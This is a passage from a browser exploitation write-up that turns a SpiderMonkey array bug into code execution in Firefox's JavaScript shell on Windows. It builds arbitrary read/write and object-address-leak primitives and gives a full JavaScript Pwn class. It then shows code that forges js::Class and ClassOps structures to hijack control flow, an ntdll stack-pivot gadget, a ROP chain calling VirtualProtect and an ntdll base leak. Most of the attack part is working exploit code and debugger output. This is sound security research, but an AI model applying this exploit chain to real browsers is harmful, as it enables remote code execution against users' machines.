13ebb201a40: js!js::TypedArrayObject: ByteOffset: 0
13ebb201a40: js!js::TypedArrayObject:    Content: Uint8Array({Length:8, ...})
@$smdump_jsvalue(0xfffe013ebb201a40)

Cool, story checks out: the Array (which size is 0x60 bytes) is adjacent to the TypedArray. It might be a good occasion for me to tell you that between the time I compiled the debug build of the JavaScript shell and the time where I compiled the release version.. some core structures slightly changed which means that if you use sm.js on the debug one it will not work :). Here is an example of change illustrated below:

0:008> dt js::Shape
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 slotInfo         : Uint4B
   +0x014 attrs            : UChar
   +0x015 flags            : UChar
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

VS

0:000> dt js::Shape
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : Uint4B
   +0x014 attrs            : UChar
   +0x015 mutableFlags     : UChar
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

As we want to corrupt the adjacent TypedArray we should probably have a look at its layout. We are interested in corrupting such an object to be able to fully control the memory. Not writing controlled js::Value anymore but actual raw bytes will be pretty useful to us. For those who are not familiar with TypedArray, they are JavaScript objects that allow you to access raw binary data like you would with C arrays. For example, Uint32Array gives you a mechanism for accessing raw uint32_t data, Uint8Array for uint8_t data, etc.

By looking at the source-code, we learn that TypedArrays are js::TypedArrayObject which subclasses js::ArrayBufferViewObject. What we want to know is basically in which slot the buffer size and the buffer pointer are stored (so that we can corrupt them):

class ArrayBufferViewObject : public NativeObject
{
  public:
    // Underlying (Shared)ArrayBufferObject.
    static constexpr size_t BUFFER_SLOT = 0;
    // Slot containing length of the view in number of typed elements.
    static constexpr size_t LENGTH_SLOT = 1;
    // Offset of view within underlying (Shared)ArrayBufferObject.
    static constexpr size_t BYTEOFFSET_SLOT = 2;
    static constexpr size_t DATA_SLOT = 3;
// [...]
};

class TypedArrayObject : public ArrayBufferViewObject

Great. This is what it looks like in the debugger:

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe0216`3cb019e0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 216`3cb019e0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000216`3ccac948 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`f7ecdac0 js::HeapSlot

0:000> dqs 216`3cb019e0
00000216`3cb019e0  00000216`3cc7ac70
00000216`3cb019e8  00000216`3ccac948
00000216`3cb019f0  00000000`00000000
00000216`3cb019f8  00007ff7`f7ecdac0 js!emptyElementsHeader+0x10
00000216`3cb01a00  fffa0000`00000000 <- BUFFER_SLOT
00000216`3cb01a08  fff88000`00000008 <- LENGTH_SLOT
00000216`3cb01a10  fff88000`00000000 <- BYTEOFFSET_SLOT
00000216`3cb01a18  00000216`3cb01a20 <- DATA_SLOT
00000216`3cb01a20  00000000`00000000 <- Inline data (8 bytes)

As you can see, the length is a js::Value and the pointer to the inline buffer of the array is a raw pointer. What is also convenient is that the elements_ field points into the .rdata section of the JavaScript engine binary (js.exe when using the JavaScript Shell, and xul.dll when using Firefox). We use it to leak the base address of the module.

With this in mind we can start to create exploitation primitives:

  1. We can leak the base address of js.exe by reading the elements_ field of the TypedArray,
  2. We can create absolute memory access primitives by corrupting the DATA_SLOT and then reading / writing through the TypedArray (can also corrupt the LENGTH_SLOT if needed).

Now, you might be wondering how we are going to be able to read a raw pointer through the Array that stores js::Value? What do you think happen if we read a user-mode pointer as a js::Value?

To answer this question, I think it is a good time to sit down and have a look at IEEE754 and the way doubles are encoded in js::Value to hopefully find out if the above operation is safe or not. The largest js::Value recognized as a double is 0x1fff0 << 47 = 0xfff8000000000000. And everything smaller is considered as a double as well. 0x1fff0 is the JSVAL_TAG_MAX_DOUBLE tag. Naively, you could think that you can encode pointers from 0x0000000000000000 to 0xfff8000000000000 as a js::Value double. The way doubles are encoded according to IEEE754 is that you have 52 bits of fraction, 11 bits of exponent and 1 bit of sign. The standard also defines a bunch of special values such as: NaN or Infinity. Let's walk through each of one them one by one.

NaN is represented through several bit patterns that follows the same rules: they all have an exponent full of bits set to 1 and the fraction can be everything except all 0 bits. Which gives us the following NaN range: [0x7ff0000000000001, 0xffffffffffffffff]. See the below for details:

  • 0x7ff0000000000001 is the smallest NaN with sign=0, exp='1'*11, frac='0'*51+'1':
    • 0b0111111111110000000000000000000000000000000000000000000000000001
  • 0xffffffffffffffff is the biggest NaN with sign=1, exp='1'*11, frac='1'*52:
    • 0b1111111111111111111111111111111111111111111111111111111111111111

There are two Infinity values for the positive and the negative ones: 0x7ff0000000000000 and 0xfff0000000000000. See the below for details:

  • 0x7ff0000000000000 is +Infinity with sign=0, exp='1'*11, frac='0'*52:
    • 0b0111111111110000000000000000000000000000000000000000000000000000
  • 0xfff0000000000000 is -Infinity with sign=1, exp='1'*11, frac='0'*52:
    • 0b1111111111110000000000000000000000000000000000000000000000000000

There are also two Zero values. A positive and a negative one which values are 0x0000000000000000 and 0x8000000000000000. See the below for details:

  • 0x0000000000000000 is +0 with sign=0, exp='0'*11, frac='0'*52:
    • 0b0000000000000000000000000000000000000000000000000000000000000000
  • 0x8000000000000000 is -0 with sign=1, exp='0'*11, frac='0'*52:
    • 0b1000000000000000000000000000000000000000000000000000000000000000

Basically NaN values are the annoying ones because if we leak a raw pointer through a js::Value we are not able to tell if its value is 0x7ff0000000000001, 0xffffffffffffffff or anything in between. The rest of the special values are fine as there is a 1:1 matching between the encoding and their meanings. In a 64-bit process on Windows, the user-mode part of the virtual address space is 128TB: from 0x0000000000000000 to 0x00007fffffffffff. Good news is that there is no intersection between the NaN range and all the possible values of a user-mode pointer; which mean we can safely leak them via a js::Value :).

If you would like to play with the above a bit more, you can use the below functions in the JavaScript Shell:

function b2f(A) {
    if(A.length != 8) {
        throw 'Needs to be an 8 bytes long array';
    }

    const Bytes = new Uint8Array(A);
    const Doubles = new Float64Array(Bytes.buffer);
    return Doubles[0];
}

function f2b(A) {
    const Doubles = new Float64Array(1);
    Doubles[0] = A;
    return Array.from(new Uint8Array(Doubles.buffer));
}

And see things for yourselves:

// +Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 240, 127]

// -Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0xff]))
[0, 0, 0, 0, 0, 0, 240, 255]

// NaN smallest
js> f2b(b2f([0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 248, 127]

// NaN biggest
js> f2b(b2f([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]))
[0, 0, 0, 0, 0, 0, 248, 127]

Anyway, this means we can leak the emptyElementsHeader pointer as well as corrupt the DATA_SLOT buffer pointer with doubles. Because I did not realize how doubles were encoded in js::Value at first (duh), I actually had another Array adjacent to the TypedArray (one Array, one TypedArray and one Array) so that I could read the pointer via the TypedArray :(.

Last thing to mention before coding a bit is that we use the Int64.js library written by saelo in order to represent 64-bit integers (that we cannot represent today with JavaScript native integers) and have utility functions to convert a double to an Int64 or vice-versa. This is not something that we have to use, but makes thing feel more natural. At the time of writing, the BigInt (aka arbitrary precision JavaScript integers) JavaScript standard wasn't enabled by default on Firefox, but this should be pretty mainstream in every major browsers quite soon. It will make all those shenanigans easier and you will not need any custom JavaScript module anymore to exploit your browser, quite the luxury :-).

Below is a summary diagram of the blaze'd Array and the TypedArray that we can corrupt via the first one:

basic.js

Building an arbitrary memory access primitive

As per the above illustration, the first Array is 0x60 bytes long (including the inline buffer, assuming we instantiate it with at most 6 entries). The inline backing buffer starts at +0x30 (6*8). The backing buffer can hold 6 js::Value (another 0x30 bytes), and the target pointer to leak is at +0x18 (3*8) of the TypedArray. This means, that if we get the 6+3th entry of the Array, we should have in return the js!emptyElementsHeader pointer encoded as a double:

js> b = new Array(1,2,3,4,5,6)
[1, 2, 3, 4, 5, 6]

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> b[9]

js> b.blaze() == undefined
false

js> b[9]
6.951651517974e-310

js> load('..\\exploits\\utils.js')

js> load('..\\exploits\\int64.js')

js> Int64.fromDouble(6.951651517974e-310).toString(16)
"0x00007ff7f7ecdac0"

# break to the debugger

0:006> ln 0x00007ff7f7ecdac0
(00007ff7`f7ecdab0)   js!emptyElementsHeader+0x10 

For the read and write primitives, as mentioned earlier, we can corrupt the DATA_SLOT pointer of the TypedArray with the address we want to read from / write to encoded as a double. Corrupting the length is even easier as it is stored as a js::Value. The base pointer should be at index 13 (9+4) and the length at index 11 (9+2).

js> b.length
420

js> c.length
8

js> b[11]
8

js> b[11] = 1337
1337

js> c.length
1337

js> b[13] = new Int64('0xdeadbeefbaadc0de').asDouble()
-1.1885958399657559e+148

Reading a byte out of c should now trigger the below exception in the debugger:

js!js::TypedArrayObject::getElement+0x4a:
00007ff7`f796648a 8a0408          mov     al,byte ptr [rax+rcx] ds:deadbeef`baadc0de=??

0:000> kc
 # Call Site
00 js!js::TypedArrayObject::getElement
01 js!js::NativeGetPropertyNoGC
02 js!Interpret
03 js!js::RunScript
04 js!js::ExecuteKernel
05 js!js::Execute
06 js!JS_ExecuteScript
07 js!Process
08 js!main
09 js!__scrt_common_main_seh
0a KERNEL32!BaseThreadInitThunk
0b ntdll!RtlUserThreadStart

0:000> lsa .
  1844:     switch (type()) {
  1845:       case Scalar::Int8:
  1846:         return Int8Array::getIndexValue(this, index);
  1847:       case Scalar::Uint8:
> 1848:         return Uint8Array::getIndexValue(this, index);
  1849:       case Scalar::Int16:
  1850:         return Int16Array::getIndexValue(this, index);
  1851:       case Scalar::Uint16:
  1852:         return Uint16Array::getIndexValue(this, index);
  1853:       case Scalar::Int32:

Pewpew.

Building an object address leak primitive

Another primitive that has been incredibly useful is something that allows to leak the address of an arbitrary JavaScript object. It is useful for both debugging and corrupting objects in memory. Again, this is fairly easy to implement once you have the below primitives. We could place a third Array (adjacent to the TypedArray), write the object we want to leak the address of in the first entry of the Array and use the TypedArray to read relatively from its inline backing buffer to retrieve the js::Value of the object to leak the address of. From there, we could just strip off some bits and call it a day. Same with the property of an adjacent object (which is used in foxpwn written by saelo). It is basically a matter of being able to read relatively from the inline buffer to a location that eventually leads you to the js::Value encoding your object address.

Another solution that does not require us to create another array is to use the first Array to write out-of-bounds into the backing buffer of our TypedArray. Then, we can simply read out of the TypedArray inline backing buffer byte by byte the js::Value and extract the object address. We should be able to write in the TypedArray buffer using the index 14 (9+5). Don't forget to instantiate your TypedArray with enough storage to account for this or you will end up corrupting memory :-).

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> d = new Array(1337, 1338, 1339)
[1337, 1338, 1339]

js> b[14] = d
[1337, 1338, 1339]

js> c.slice(0, 8)
({0:32, 1:29, 2:32, 3:141, 4:108, 5:1, 6:254, 7:255})

js> Int64.fromJSValue(c.slice(0, 8)).toString(16)
"0x0000016c8d201d20"

And we can verify with the debugger that we indeed leaked the address of d:

0:005> !smdump_jsobject 0x16c8d201d20
16c8d201d20: js!js::ArrayObject:   Length: 3
16c8d201d20: js!js::ArrayObject: Capacity: 6
16c8d201d20: js!js::ArrayObject:  Content: [0x539, 0x53a, 0x53b]
@$smdump_jsvalue(0xfffe016c8d201d20)

0:005> ? 539
Evaluate expression: 1337 = 00000000`00000539

Sweet, we now have all the building blocks we require to write basic.js and pop some calc. At this point, I combined all the primitives we described in a Pwn class that abstracts away the corruption details:

class __Pwn {
    constructor() {
        this.SavedBase = Smalls[13];
    }

    __Access(Addr, LengthOrValues) {
        if(typeof Addr == 'string') {
            Addr = new Int64(Addr);
        }

        const IsRead = typeof LengthOrValues == 'number';
        let Length = LengthOrValues;
        if(!IsRead) {
            Length = LengthOrValues.length;
        }

        if(IsRead) {
            dbg('Read(' + Addr.toString(16) + ', ' + Length + ')');
        } else {
            dbg('Write(' + Addr.toString(16) + ', ' + Length + ')');
        }

        //
        // Fix U8A's byteLength.
        //

        Smalls[11] = Length;

        //
        // Verify that we properly corrupted the length of U8A.
        //

        if(U8A.byteLength != Length) {
            throw "Error: The Uint8Array's length doesn't check out";
        }

        //
        // Fix U8A's base address.
        //

        Smalls[13] = Addr.asDouble();

        if(IsRead) {
            return U8A.slice(0, Length);
        }

        U8A.set(LengthOrValues);
    }

    Read(Addr, Length) {
        return this.__Access(Addr, Length);
    }

    WritePtr(Addr, Value) {
        const Values = new Int64(Value);
        this.__Access(Addr, Values.bytes());
    }

    ReadPtr(Addr) {
        return new Int64(this.Read(Addr, 8));
    }

    AddrOf(Obj) {

        //
        // Fix U8A's byteLength and base.
        //

        Smalls[11] = 8;
        Smalls[13] = this.SavedBase;

        //
        // Smalls is contiguous with U8A. Go and write a jsvalue in its buffer,
        // and then read it out via U8A.
        //

        Smalls[14] = Obj;
        return Int64.fromJSValue(U8A.slice(0, 8));
    }
};

const Pwn = new __Pwn();

Hijacking control-flow

Now that we have built ourselves all the necessary tools, we need to find a way to hijack control-flow. In Firefox, this is not something that is protected against by any type of CFI implementations so it is just a matter of finding a writeable function pointer and a way to trigger its invocation from JavaScript. We will deal with the rest later :).

Based off what I have read over time, there have been several ways to achieve that depending on the context and your constraints:

  1. Overwriting a saved-return address (what people usually choose to do when software is protected with forward-edge CFI),
  2. Overwriting a virtual-table entry (plenty of those in a browser context),
  3. Overwriting a pointer to a JIT'd JavaScript function (good target in a JavaScript shell as the above does not really exist),
  4. Overwriting another type of function pointer (another good target in a JavaScript shell environment).

The last item is the one we will be focusing on today. Finding such target was not really hard as one was already described by Hanming Zhang from 360 Vulcan team.

Every JavaScript object defines various methods and as a result, those must be stored somewhere. Lucky for us, there are a bunch of Spidermonkey structures that describe just that. One of the fields we did not mention earlier in a js:NativeObject is the group_ field. A js::ObjectGroup documents type information of a group of objects. The clasp_ field links to another object that describes the class of the object group.

For example, the class for our b object is an Uint8Array. That is precisely in this object that the name of the class, and the various methods it defines can be found. If we follow the cOps field of the js::Class object we end up on a bunch of function pointers that get invoked by the JavaScript engine at special times: adding a property to an object, removing a property, etc.

Enough talking, let's have a look in the debugger what it actually looks like with a TypedArray object:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`f7aee140 56              push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe016c`8d201cc0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 0x016c8d201cc0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x0000016c`8daac970 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`f7ecdac0 js::HeapSlot

0:000> dt js!js::GCPtr<js::ObjectGroup *> 0x16c8d201cc0
   +0x000 value            : 0x0000016c`8da7ad30 js::Ob

0:000> dt js!js::ObjectGroup 0x0000016c`8da7ad30
   +0x000 clasp_           : 0x00007ff7`f7edc510 js::Class
   +0x008 proto_           : js::GCPtr<js::TaggedProto>
   +0x010 realm_           : 0x0000016c`8d92a800 JS::Realm
   +0x018 flags_           : 1
   +0x020 addendum_        : (null) 
   +0x028 propertySet      : (null) 

0:000> dt js!js::Class 0x00007ff7`f7edc510 
   +0x000 name             : 0x00007ff7`f7f8e0e8  "Uint8Array"
   +0x008 flags            : 0x65200303
   +0x010 cOps             : 0x00007ff7`f7edc690 js::ClassOps
   +0x018 spec             : 0x00007ff7`f7edc730 js::ClassSpec
   +0x020 ext              : 0x00007ff7`f7edc930 js::ClassExtension
   +0x028 oOps             : (null) 

0:000> dt js!js::ClassOps 0x00007ff7`f7edc690
   +0x000 addProperty      : (null) 
   +0x008 delProperty      : (null) 
   +0x010 enumerate        : (null) 
   +0x018 newEnumerate     : (null) 
   +0x020 resolve          : (null) 
   +0x028 mayResolve       : (null) 
   +0x030 finalize         : 0x00007ff7`f7961000     void  js!js::TypedArrayObject::finalize+0
   +0x038 call             : (null) 
   +0x040 hasInstance      : (null) 
   +0x048 construct        : (null) 
   +0x050 trace            : 0x00007ff7`f780a330     void  js!js::ArrayBufferViewObject::trace+0

0:000> !address 0x00007ff7`f7edc690
Usage:                  Image
Base Address:           00007ff7`f7e9a000
End Address:            00007ff7`f7fd4000
Region Size:            00000000`0013a000 (   1.227 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000002          PAGE_READONLY
Type:                   01000000          MEM_IMAGE

Naturally those pointers are stored in a read only section which means we cannot overwrite them directly. But it is fine, we can keep stepping backward until finding a writeable pointer. Once we do we can artificially recreate ourselves the chain of structures up to the cOps field but with hijacked pointers. Based on the above, the "earliest" object we can corrupt is the js::ObjectGroup one and more precisely its clasp_ field.

Cool. Before moving forward, we probably need to verify that if we were able to control the cOps function pointers, would we be able to hijack control flow from JavaScript?

Well, let's overwrite the cOps.addProperty field directly from the debugger:

0:000> eq 0x00007ff7`f7edc690 deadbeefbaadc0de

0:000> g

And add a property to the object:

js> c.diary_of_a_reverse_engineer = 1337

0:000> g
(3af0.3b40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
js!js::CallJSAddPropertyOp+0x6c:
00007ff7`80e400cc 48ffe0          jmp     rax {deadbeef`baadc0de}

0:000> kc
 # Call Site
00 js!js::CallJSAddPropertyOp
01 js!CallAddPropertyHook
02 js!AddDataProperty
03 js!DefineNonexistentProperty
04 js!SetNonexistentProperty<1>
05 js!js::NativeSetProperty<1>
06 js!js::SetProperty
07 js!SetPropertyOperation
08 js!Interpret
09 js!js::RunScript
0a js!js::ExecuteKernel
0b js!js::Execute
0c js!ExecuteScript
0d js!JS_ExecuteScript
0e js!RunFile
0f js!Process
10 js!ProcessArgs
11 js!Shell
12 js!main
13 js!invoke_main
14 js!__scrt_common_main_seh
15 KERNEL32!BaseThreadInitThunk
16 ntdll!RtlUserThreadStart

Thanks to the Pwn class we wrote earlier this should be pretty easy to pull off. We can use Pwn.AddrOf to leak an object address (called Target below), follow the chain of pointers and recreating those structures by just copying their content into the backing buffer of a TypedArray for example (called MemoryBackingObject below). Once this is done, simply we overwrite the addProperty field of our target object.

//
// Retrieve a bunch of addresses needed to replace Target's clasp_ field.
//

const Target = new Uint8Array(90);
const TargetAddress = Pwn.AddrOf(Target);
const TargetGroup_ = Pwn.ReadPtr(TargetAddress);
const TargetClasp_ = Pwn.ReadPtr(TargetGroup_);
const TargetcOps = Pwn.ReadPtr(Add(TargetClasp_, 0x10));
const TargetClasp_Address = Add(TargetGroup_, 0x0);

const TargetShapeOrExpando_ = Pwn.ReadPtr(Add(TargetAddress, 0x8));
const TargetBase_ = Pwn.ReadPtr(TargetShapeOrExpando_);
const TargetBaseClasp_Address = Add(TargetBase_, 0);

const MemoryBackingObject = new Uint8Array(0x88);
const MemoryBackingObjectAddress = Pwn.AddrOf(MemoryBackingObject);
const ClassMemoryBackingAddress = Pwn.ReadPtr(Add(MemoryBackingObjectAddress, 7 * 8));
// 0:000> ?? sizeof(js!js::Class)
// unsigned int64 0x30
const ClassOpsMemoryBackingAddress = Add(ClassMemoryBackingAddress, 0x30);
print('[+] js::Class / js::ClassOps backing memory is @ ' + MemoryBackingObjectAddress.toString(16));

//
// Copy the original Class object into our backing memory, and hijack
// the cOps field.
//

MemoryBackingObject.set(Pwn.Read(TargetClasp_, 0x30), 0);
MemoryBackingObject.set(ClassOpsMemoryBackingAddress.bytes(), 0x10);

//
// Copy the original ClassOps object into our backing memory and hijack
// the add property.
//

MemoryBackingObject.set(Pwn.Read(TargetcOps, 0x50), 0x30);
MemoryBackingObject.set(new Int64('0xdeadbeefbaadc0de').bytes(), 0x30);

print("[*] Overwriting Target's clasp_ @ " + TargetClasp_Address.toString(16));
Pwn.WritePtr(TargetClasp_Address, ClassMemoryBackingAddress);
print("[*] Overwriting Target's shape clasp_ @ " + TargetBaseClasp_Address.toString(16));
Pwn.WritePtr(TargetBaseClasp_Address, ClassMemoryBackingAddress);

//
// Let's pull the trigger now.
//

print('[*] Pulling the trigger bebe..');
Target.im_falling_and_i_cant_turn_back = 1;

Note that we also overwrite another field in the shape object as the debug version of the JavaScript shell has an assert that ensures that the object class retrieved from the shape is identical to the one in the object group. If you don't, here is the crash you will encounter:

Assertion failure: shape->getObjectClass() == getClass(), at c:\Users\over\mozilla-central\js\src\vm/NativeObject-inl.h:659

Pivoting the stack

As always with modern exploitation, hijacking control-flow is the beginning of the journey. We want to execute arbitrary native code in the JavaScript. To exploit this traditionally with ROP we have three of the four ingredients:

  • We know where things are in memory,
  • We have a way to control the execution,
  • We have arbitrary space to store the chain and aren't constrained in any way,
  • But we do not have a way to pivot the stack to a region of memory we have under our control.

Now if we want to pivot the stack to a location under our control, we need to have some sort of control of the CPU context when we hijack the control-flow. To understand a bit more with which cards we are playing with, we need to investigate how this function pointer is invoked and see if we can control any arguments, etc.

/** Add a property named by id to obj. */
typedef bool (*JSAddPropertyOp)(JSContext* cx, JS::HandleObject obj,
                                JS::HandleId id, JS::HandleValue v);

And here is the CPU context at the hijack point:

0:000> r
rax=000000000001fff1 rbx=000000469b9ff490 rcx=0000020a7d928800
rdx=000000469b9ff490 rsi=0000020a7d928800 rdi=deadbeefbaadc0de
rip=00007ff658b7b3a2 rsp=000000469b9fefd0 rbp=0000000000000000
 r8=000000469b9ff248  r9=0000020a7deb8098 r10=0000000000000000
r11=0000000000000000 r12=0000020a7da02e10 r13=000000469b9ff490
r14=0000000000000001 r15=0000020a7dbbc0b0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
js!js::NativeSetProperty<js::Qualified>+0x2b52:
00007ff6`58b7b3a2 ffd7            call    rdi {deadbeef`baadc0de}

Let's break down the CPU context:

  1. @rdx is obj which is a pointer to the JSObject (Target in the script above. Also note that @rbx has the same value),
  2. @r8 is id which is a pointer to a jsid describing the name of the property we are trying to add which is im_falling_and_i_cant_turn_back in our case,
  3. @r9 is v which is a pointer to a js::Value (the JavaScript integer 1 in the script above).

As always, reality check in the debugger:

0:000> dqs @rdx l1
00000046`9b9ff490  0000020a`7da02e10

0:000> !smdump_jsobject 0x20a7da02e10
20a7da02e10: js!js::TypedArrayObject:       Type: Uint8Array
20a7da02e10: js!js::TypedArrayObject:     Length: 90
20a7da02e10: js!js::TypedArrayObject: ByteLength: 90
20a7da02e10: js!js::TypedArrayObject: ByteOffset: 0
20a7da02e10: js!js::TypedArrayObject:    Content: Uint8Array({Length:90, ...})
@$smdump_jsobject(0x20a7da02e10)


0:000> dqs @r8 l1
00000046`9b9ff248  0000020a`7dbaf100

0:000> dqs 0000020a`7dbaf100
0000020a`7dbaf100  0000001f`00000210
0000020a`7dbaf108  0000020a`7dee2f20

0:000> da 0000020a`7dee2f20
0000020a`7dee2f20  "im_falling_and_i_cant_turn_back"


0:000> dqs @r9 l1
0000020a`7deb8098  fff88000`00000001

0:000> !smdump_jsvalue 0xfff8800000000001
1: JSVAL_TYPE_INT32: 0x1
@$smdump_jsvalue(0xfff8800000000001)

It is not perfect, but sounds like we have at least some amount of control over the context. Looking back at it, I guess I could have gone several ways (a few described below):

  1. As @rdx points to the Target object, we could try to pivot to the inline backing buffer of the TypedArray to trigger a ROP chain,
  2. As @r8 points to a pointer to an arbitrary string of our choice, we could inject a pointer to the location of our ROP chain disguised as the content of the property name,
  3. As @r9 points to a js::Value, we could try to inject a double that once encoded is a valid pointer to a location with our ROP chain.

At the time, I only saw one way: the first one. The idea is to create a TypedArray with the biggest inline buffer possible. Leveraging the inline buffer means that there is less memory dereference to do making the pivot is simpler. Assuming we manage to pivot in there, we can have a very small ROP chain redirecting to a second one stored somewhere where we have infinite space.

The stack-pivot gadget we are looking for looks like the following - pivoting in the inline buffer:

rsp <- [rdx] + X with 0x40 <= X < 0x40 + 90

Or - pivoting in the buffer:

rsp <- [[rdx] + 0x38]

Finding this pivot actually took me way more time than I expected. I spent a bunch of time trying to find it manually and trying various combinations (JOP, etc.). This didn't really work at which point I decided to code-up a tool that would try to pivot to every executable bytes available in the address-space and emulate forward until seeing a crash with rsp containing marker bytes.

After banging my head around and failing for a while, this solution eventually worked. It was not perfect as I wanted to only look for gadgets inside the js.exe module at first. It turns out the one pivot the tool found is in ntdll.dll. What is annoying about this is basically two things:

  1. It means that we also need to leak the base address of the ntdll module. Fine, this should not be hard to pull off, but just more code to write.

  2. It also means that now the exploit relies on a system module that changes over time: different version of Windows, security updates in ntdll, etc. making the exploit even less reliable.

Oh well, I figured that I would first focus on making the exploit work as opposed to feeling bad about the reliability part. Those would be problems for another day (and this is what kaizen.js tries to fix).

Here is the gadget that my tool ended up finding:

0:000> u ntdll+000bfda2 l10
ntdll!TpSimpleTryPost+0x5aeb2:
00007fff`b8c4fda2 f5              cmc
00007fff`b8c4fda3 ff33            push    qword ptr [rbx]
00007fff`b8c4fda5 db4889          fisttp  dword ptr [rax-77h]
00007fff`b8c4fda8 5c              pop     rsp
00007fff`b8c4fda9 2470            and     al,70h
00007fff`b8c4fdab 8b7c2434        mov     edi,dword ptr [rsp+34h]
00007fff`b8c4fdaf 85ff            test    edi,edi
00007fff`b8c4fdb1 0f884a52faff    js      ntdll!TpSimpleTryPost+0x111 (00007fff`b8bf5001)

0:000> u 00007fff`b8bf5001
ntdll!TpSimpleTryPost+0x111:
00007fff`b8bf5001 8bc7            mov     eax,edi
00007fff`b8bf5003 488b5c2468      mov     rbx,qword ptr [rsp+68h]
00007fff`b8bf5008 488b742478      mov     rsi,qword ptr [rsp+78h]
00007fff`b8bf500d 4883c440        add     rsp,40h
00007fff`b8bf5011 415f            pop     r15
00007fff`b8bf5013 415e            pop     r14
00007fff`b8bf5015 5f              pop     rdi
00007fff`b8bf5016 c3              ret

And here are the parts that actually matter:

00007fff`b8c4fda3 ff33            push    qword ptr [rbx]
[...]
00007fff`b8c4fda8 5c              pop     rsp
00007fff`b8bf500d 4883c440        add     rsp,40h
[...]
00007fff`b8bf5016 c3              ret

Of course, if you have followed along, you might be wondering what is the value of @rbx at the hijack point as we did not really spent any time talking about it. Well, if you scroll a bit up, you will notice that @rbx is the same value as @rdx which is a pointer to the JSObject describing Target.

  1. The first line pushes on the stack the actual JSObject,
  2. The second line pops it off the stack into @rsp,
  3. The third line adds 0x40 to it which means @rsp now points into the backing buffer of the TypedArray which we fully control the content of,
  4. And finally we return.

With this pivot, we have control over the execution flow, as well as control over the stack; this is good stuff :-). The ntdll module used at the time is available here ntdll (RS5 64-bit, Jan 2019) in case anyone is interested.

The below shows step-by-step what it looks like from the debugger once we land on the above stack-pivot gadget:

0:000> bp ntdll+bfda2

0:000> g
Breakpoint 0 hit
ntdll!TpSimpleTryPost+0x5aeb2:
00007fff`b8c4fda2 f5              cmc

0:000> t
ntdll!TpSimpleTryPost+0x5aeb3:
00007fff`b8c4fda3 ff33            push    qword ptr [rbx] ds:000000d8`a93fce78=000002b2f7509140

[...]

0:000> t
ntdll!TpSimpleTryPost+0x5aeb8:
00007fff`b8c4fda8 5c              pop     rsp

[...]

0:000> t
ntdll!TpSimpleTryPost+0x11d:
00007fff`b8bf500d 4883c440        add     rsp,40h

[...]

0:000> t
ntdll!TpSimpleTryPost+0x126:
00007fff`b8bf5016 c3              ret

0:000> dqs @rsp
000002b2`f7509198  00007ff7`805a9e55 <- Pivot again to a larger space
000002b2`f75091a0  000002b2`f7a75000 <- The stack with our real ROP chain

0:000> u 00007ff7`805a9e55 l2
00007ff7`805a9e55 5c              pop     rsp
00007ff7`805a9e56 c3              ret

0:000> dqs 000002b2`f7a75000
000002b2`f7a75000  00007ff7`805fc4ec <- Beginning of the ROP chain that makes this region executable
000002b2`f7a75008  000002b2`f7926400
000002b2`f7a75010  00007ff7`805a31da
000002b2`f7a75018  00000000`000002a8
000002b2`f7a75020  00007ff7`80a9c302
000002b2`f7a75028  00000000`00000040
000002b2`f7a75030  00007fff`b647b0b0 KERNEL32!VirtualProtectStub
000002b2`f7a75038  00007ff7`81921d09
000002b2`f7a75040  11111111`11111111
000002b2`f7a75048  22222222`22222222
000002b2`f7a75050  33333333`33333333
000002b2`f7a75058  44444444`44444444

Awesome :).

Leaking ntdll base address

Solving the above step unfortunately added another problem to solve on our list. Even though we found a pivot, we now need to retrieve at runtime where the ntdll module is loaded at.

As this exploit is already pretty full of hardcoded offsets and bad decisions there is an easy way out. We already have the base address of the js.exe module and we know js.exe imports functions from a bunch of other modules such as kernel32.dll (but not ntdll.dll). From there, I basically dumped all the imported functions from kernel32.dll and saw this:

0:000> !dh -a js
[...]
  _IMAGE_IMPORT_DESCRIPTOR 00007ff781e3e118
    KERNEL32.dll
      00007FF781E3D090 Import Address Table
      00007FF781E3E310 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

0:000> dqs 00007FF781E3D090
00007ff7`81e3d090  00007fff`b647c2d0 KERNEL32!RtlLookupFunctionEntryStub
00007ff7`81e3d098  00007fff`b6481890 KERNEL32!RtlCaptureContext
00007ff7`81e3d0a0  00007fff`b6497390 KERNEL32!UnhandledExceptionFilterStub
00007ff7`81e3d0a8  00007fff`b6481b30 KERNEL32!CreateEventW
